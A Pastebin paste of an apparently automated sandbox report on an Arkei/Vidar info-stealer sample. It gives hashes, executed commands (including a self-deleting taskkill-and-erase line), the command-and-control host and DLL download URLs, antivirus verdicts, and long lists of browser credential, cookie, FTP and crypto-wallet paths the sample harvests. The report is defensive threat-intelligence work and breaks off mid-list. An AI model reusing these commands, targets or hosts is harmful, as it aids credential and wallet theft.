Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * ID: 1273
- * MalFamily: "Arkei"
- * MalScore: 10.0
- * File Name: "Exes_105f94e56d5fc9fc7555aef13e0af78e.exe"
- * File Size: 722944
- * File Type: "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows"
- * SHA256: "caec69a18e91839c1a46c79c6b55e68e14ba32ec2f2642a375870f958846fc66"
- * MD5: "105f94e56d5fc9fc7555aef13e0af78e"
- * SHA1: "3bc068404a65522272c36b64cceb2adcabb04fb6"
- * SHA512: "4e9136ad3b3b5b4090668ef66e455fc24e5813789a858018022398a84f018f8d7f41573933c3aecda7689926a4d61a1a1494bc5ed81805fb5848757960e777ae"
- * CRC32: "BF36EC09"
- * SSDEEP: "12288:RkOEBVhr1go+yrFYnldnYBxXNRKuEBzhUEVNjHZ7BOXO3v9tq5o:RkOEBaozrFYns6/5/JBOWv9I"
- * Process Execution:
- "8JB5A.exe",
- "8JB5A.exe",
- "cmd.exe",
- "taskkill.exe",
- "services.exe",
- "lsass.exe",
- "svchost.exe",
- "WmiPrvSE.exe",
- "svchost.exe",
- "taskeng.exe",
- "taskeng.exe",
- "msoia.exe",
- "msoia.exe",
- "taskeng.exe",
- "taskeng.exe",
- "WMIADAP.exe"
- * Executed Commands:
- "\"C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe\"",
- "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im 8JB5A.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe & exit",
- "C:\\Windows\\System32\\cmd.exe /c taskkill /im 8JB5A.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe & exit",
- "C:\\Windows\\system32\\lsass.exe",
- "taskkill /im 8JB5A.exe /f",
- "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
- "taskeng.exe 633E54B2-2944-4AC4-90FA-C69D6C08EDCB S-1-5-18:NT AUTHORITY\\System:Service:",
- "taskeng.exe 55EB258C-A9EA-4DA4-A8EF-E736F5A950CE S-1-5-21-0000000000-0000000000-0000000000-1000:Host\\user:Interactive:1",
- "taskeng.exe C47FF73B-279F-4D5D-8B65-FD7750272025 S-1-5-18:NT AUTHORITY\\System:Service:",
- "taskeng.exe 67AD5638-AA7B-49DE-8A67-3D392C370D2A S-1-5-18:NT AUTHORITY\\System:Service:",
- "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\"",
- "\"C:\\Program Files\\Microsoft Office\\Office15\\msoia.exe\" scan upload mininterval:2880",
- "\"C:\\Program Files\\Microsoft Office\\Office15\\msoia.exe\" scan upload"
- * Signatures Detected:
- "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
- "Details":
- "Description": "Behavioural detection: Executable code extraction",
- "Details":
- "Description": "Anomalous file deletion behavior detected (10+)",
- "Details":
- "DeletedFile": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.1732.26820656"
- "DeletedFile": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1732.26820671"
- "DeletedFile": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1732.26820671"
- "DeletedFile": "C:\\ProgramData\\freebl3.dll"
- "DeletedFile": "C:\\ProgramData\\mozglue.dll"
- "DeletedFile": "C:\\ProgramData\\msvcp140.dll"
- "DeletedFile": "C:\\ProgramData\\nss3.dll"
- "DeletedFile": "C:\\ProgramData\\softokn3.dll"
- "DeletedFile": "C:\\ProgramData\\vcruntime140.dll"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Autofill\\Google Chrome_Default.txt"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Autofill"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\CC\\Google Chrome_Default.txt"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\CC"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Edge_Cookies.txt"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Google Chrome_Default.txt"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\IE_Cookies.txt"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\cookie_list.txt"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Downloads\\Google Chrome_Default.txt"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Downloads"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\History\\Google Chrome_Default.txt"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\History"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\information.txt"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\passwords.txt"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\screenshot.jpg"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Soft\\Authy"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Soft"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Anoncoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\BBQCoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Bitcoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DashCore"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DevCoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DigitalCoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\ElectronCash"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Electrum"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\ElectrumLTC"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Ethereum"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Exodus"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FlorinCoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Franko"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FreiCoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\GoldCoinGLD"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\InfiniteCoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IOCoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IxCoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\JAXX"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Litecoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MegaCoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MinCoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MultiDoge"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\NameCoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\PrimeCoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\TerraCoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\YACoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Zcash"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\US_00000000-0000-0000-0000-0000000000002566241227.zip"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe"
- "DeletedFile": "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
- "Description": "Guard pages use detected - possible anti-debugging.",
- "Details":
- "Description": "A process attempted to delay the analysis task.",
- "Details":
- "Process": "taskeng.exe tried to sleep 481 seconds, actually delayed analysis time by 0 seconds"
- "Process": "WmiPrvSE.exe tried to sleep 360 seconds, actually delayed analysis time by 0 seconds"
- "Description": "Performs HTTP requests potentially not found in PCAP.",
- "Details":
- "url_ioc": "dersed.com:80//288"
- "url_ioc": "dersed.com:80//freebl3.dll"
- "url_ioc": "dersed.com:80//mozglue.dll"
- "url_ioc": "dersed.com:80//msvcp140.dll"
- "url_ioc": "dersed.com:80//nss3.dll"
- "url_ioc": "dersed.com:80//softokn3.dll"
- "url_ioc": "dersed.com:80//vcruntime140.dll"
- "url_ioc": "ip-api.com:80//line/"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "8JB5A.exe -> C:\\Windows\\System32\\cmd.exe"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
- "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
- "suspicious_request_iocs": "http://dersed.com/288"
- "suspicious_request_iocs": "http://dersed.com/freebl3.dll"
- "suspicious_request_iocs": "http://dersed.com/mozglue.dll"
- "suspicious_request_iocs": "http://dersed.com/msvcp140.dll"
- "suspicious_request_iocs": "http://dersed.com/nss3.dll"
- "suspicious_request_iocs": "http://dersed.com/softokn3.dll"
- "suspicious_request_iocs": "http://dersed.com/vcruntime140.dll"
- "suspicious_request_iocs": "http://ip-api.com/line/"
- "suspicious_request_iocs": "http://dersed.com/"
- "Description": "Performs some HTTP requests",
- "Details":
- "url_iocs": "http://dersed.com/288"
- "url_iocs": "http://dersed.com/freebl3.dll"
- "url_iocs": "http://dersed.com/mozglue.dll"
- "url_iocs": "http://dersed.com/msvcp140.dll"
- "url_iocs": "http://dersed.com/nss3.dll"
- "url_iocs": "http://dersed.com/softokn3.dll"
- "url_iocs": "http://dersed.com/vcruntime140.dll"
- "url_iocs": "http://ip-api.com/line/"
- "url_iocs": "http://dersed.com/"
- "Description": "The binary likely contains encrypted or compressed data.",
- "Details":
- "section": "name: .text, entropy: 7.95, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x000afc00, virtual_size: 0x000afa54"
- "Description": "Uses Windows utilities for basic functionality",
- "Details":
- "command": "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im 8JB5A.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe & exit"
- "command": "C:\\Windows\\System32\\cmd.exe /c taskkill /im 8JB5A.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe & exit"
- "command": "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\""
- "Description": "Behavioural detection: Injection (Process Hollowing)",
- "Details":
- "Injection": "8JB5A.exe(1732) -> 8JB5A.exe(2016)"
- "Description": "Executed a process and injected code into it, probably while unpacking",
- "Details":
- "Injection": "8JB5A.exe(1732) -> 8JB5A.exe(2016)"
- "Description": "Deletes its original binary from disk",
- "Details":
- "Description": "Behavioural detection: Injection (inter-process)",
- "Details":
- "Description": "Steals private information from local Internet browsers",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\IE_Cookies.txt"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Edge_Cookies.txt"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Google Chrome_Default.txt"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
- "Description": "Collects information about installed applications",
- "Details":
- "Program": "Google Update Helper"
- "Program": "Microsoft Excel MUI 2013"
- "Program": "Microsoft Outlook MUI 2013"
- "Program": "Google Chrome"
- "Program": "Adobe Flash Player 29 NPAPI"
- "Program": "Adobe Flash Player 29 ActiveX"
- "Program": "Microsoft DCF MUI 2013"
- "Program": "Microsoft Access MUI 2013"
- "Program": "Microsoft Office Proofing Tools 2013 - English"
- "Program": "Adobe Acrobat Reader DC"
- "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xef\\xbf\\xb1ol"
- "Program": "Microsoft Publisher MUI 2013"
- "Program": "Outils de v\\xef\\xbf\\xa9rification linguistique 2013 de Microsoft Office\\xef\\xbe\\xa0- Fran\\xef\\xbf\\xa7ais"
- "Program": "Microsoft Office Shared MUI 2013"
- "Program": "Microsoft Office OSM MUI 2013"
- "Program": "Microsoft InfoPath MUI 2013"
- "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
- "Program": "Microsoft Word MUI 2013"
- "Program": "Microsoft Groove MUI 2013"
- "Program": "Microsoft Access Setup Metadata MUI 2013"
- "Program": "Microsoft Office OSM UX MUI 2013"
- "Program": "Java Auto Updater"
- "Program": "Microsoft PowerPoint MUI 2013"
- "Program": "Microsoft Office Professional Plus 2013"
- "Program": "Adobe Refresh Manager"
- "Program": "Microsoft Office Proofing 2013"
- "Program": "Microsoft Lync MUI 2013"
- "Program": "Microsoft OneNote MUI 2013"
- "Description": "Stack pivoting was detected when using a critical API",
- "Details":
- "process": "WmiPrvSE.exe:3968"
- "Description": "File has been identified by 37 Antiviruses on VirusTotal as malicious",
- "Details":
- "MicroWorld-eScan": "Trojan.GenericKD.32387802"
- "FireEye": "Generic.mg.105f94e56d5fc9fc"
- "McAfee": "RDN/Generic.grp"
- "AegisLab": "Trojan.MSIL.Chapak.4!c"
- "K7AntiVirus": "Trojan ( 005573d61 )"
- "K7GW": "Trojan ( 005573d61 )"
- "Cybereason": "malicious.04a655"
- "Arcabit": "Trojan.Generic.D1EE32DA"
- "Invincea": "heuristic"
- "Symantec": "ML.Attribute.HighConfidence"
- "APEX": "Malicious"
- "Paloalto": "generic.ml"
- "Kaspersky": "HEUR:Trojan.MSIL.Chapak.gen"
- "BitDefender": "Trojan.GenericKD.32387802"
- "Avast": "Win32:Trojan-gen"
- "Ad-Aware": "Trojan.GenericKD.32387802"
- "Sophos": "Mal/Generic-S"
- "DrWeb": "Trojan.Inject3.20236"
- "McAfee-GW-Edition": "BehavesLike.Win32.Generic.bc"
- "Emsisoft": "Trojan.GenericKD.32387802 (B)"
- "SentinelOne": "DFI - Malicious PE"
- "Microsoft": "Trojan:MSIL/CryptInject"
- "Endgame": "malicious (moderate confidence)"
- "ZoneAlarm": "HEUR:Trojan.MSIL.Chapak.gen"
- "GData": "Trojan.GenericKD.32387802"
- "Acronis": "suspicious"
- "MAX": "malware (ai score=100)"
- "Malwarebytes": "Spyware.Vidar"
- "ESET-NOD32": "a variant of Generik.LSRSOXR"
- "Ikarus": "Trojan.SuspectCRC"
- "MaxSecure": "Trojan.Malware.300983.susgen"
- "Fortinet": "MSIL/Malicious_Behavior.VEX"
- "Webroot": "W32.Trojan.Emotet"
- "AVG": "Win32:Trojan-gen"
- "Panda": "Trj/GdSda.A"
- "CrowdStrike": "win/malicious_confidence_100% (W)"
- "Qihoo-360": "Win32/Trojan.973"
- "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
- "Details":
- "Description": "Attempts to access Bitcoin/ALTCoin wallets",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Bitcoin\\\\x12"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Bitcoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\\\x12"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Electrum\\\n"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\default_wallet"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\\n"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Electrum\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Litecoin\\*.*"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Litecoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\NameCoin\\*.*"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\NameCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\TerraCoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\TerraCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\PrimeCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\PrimeCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FreiCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FreiCoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DevCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DevCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Franko\\*.*"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Franko\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MegaCoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MegaCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\InfiniteCoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\InfiniteCoin\\*.*"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IxCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IxCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Anoncoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Anoncoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\BBQCoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\BBQCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DigitalCoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DigitalCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MinCoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MinCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\\n"
- "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\YACoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\YACoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FlorinCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FlorinCoin\\"
- "Description": "Harvests credentials from local FTP client softwares",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
- "Description": "Harvests information related to installed instant messenger clients",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
- "Description": "Collects information to fingerprint the system",
- "Details":
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET TROJAN Vidar/Arkei Stealer Client Data Upload"
- "Description": "Uses suspicious command line tools or Windows utilities",
- "Details":
- "command": "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im 8JB5A.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe & exit"
- "command": "C:\\Windows\\System32\\cmd.exe /c taskkill /im 8JB5A.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe & exit"
- "command": "taskkill /im 8JB5A.exe /f"
- * Started Service:
- "VaultSvc"
- * Mutexes:
- "Global\\CLR_PerfMon_WrapMutex",
- "Global\\CLR_CASOFF_MUTEX",
- "00000000-0000-0000-0000-0000000000003d3783a0-703a-11de-8c7a-806e6f6e6963",
- "Global\\ADAP_WMI_ENTRY",
- "Global\\RefreshRA_Mutex",
- "Global\\RefreshRA_Mutex_Lib",
- "Global\\RefreshRA_Mutex_Flag"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\GDIPFONTCACHEV1.DAT",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\passwords.txt",
- "C:\\ProgramData\\freebl3.dll",
- "C:\\ProgramData\\mozglue.dll",
- "C:\\ProgramData\\msvcp140.dll",
- "C:\\ProgramData\\nss3.dll",
- "C:\\ProgramData\\softokn3.dll",
- "C:\\ProgramData\\vcruntime140.dll",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\ld",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\historych",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\History\\Google Chrome_Default.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Downloads\\Google Chrome_Default.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\c",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Google Chrome_Default.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\wd",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Autofill\\Google Chrome_Default.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\CC\\Google Chrome_Default.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Soft\\Authy\\\\xef\\x94\\x98Q\\xc9\\x86",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\IE_Cookies.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Edge_Cookies.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\cookie_list.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\information.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Bitcoin\\\\x12",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Ethereum\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Electrum\\\n",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\ElectrumLTC\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Exodus\\\n",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Exodus\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\ElectronCash\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MultiDoge\\\n",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Zcash\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DashCore\\",
